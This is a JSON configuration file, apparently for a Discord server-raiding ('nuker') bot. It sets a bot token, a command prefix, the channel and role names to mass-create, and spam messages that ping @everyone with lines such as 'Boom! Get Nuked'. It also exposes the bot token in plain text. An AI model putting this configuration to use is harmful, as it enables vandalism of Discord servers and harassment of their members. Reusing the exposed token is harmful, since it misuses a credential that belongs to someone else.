{
"bot_token": "OTg0Nzk1NzE1ODc4NDA0MTY2.GSdQmj.94gCLGMK2MKVBnPhJpL1NX3AxC0gS4r6Wi6Jpc",
"prefix": "$",
"channelnames": "Axe Runs Cord",
"rolenames": "AXES RUNS CORD",
"spam_text": ["@everyone Axes Runs Cord", "@everyone Boom! Get Nuked", "@everyone Axes Are Cool", "@everyone Beamed"]
}
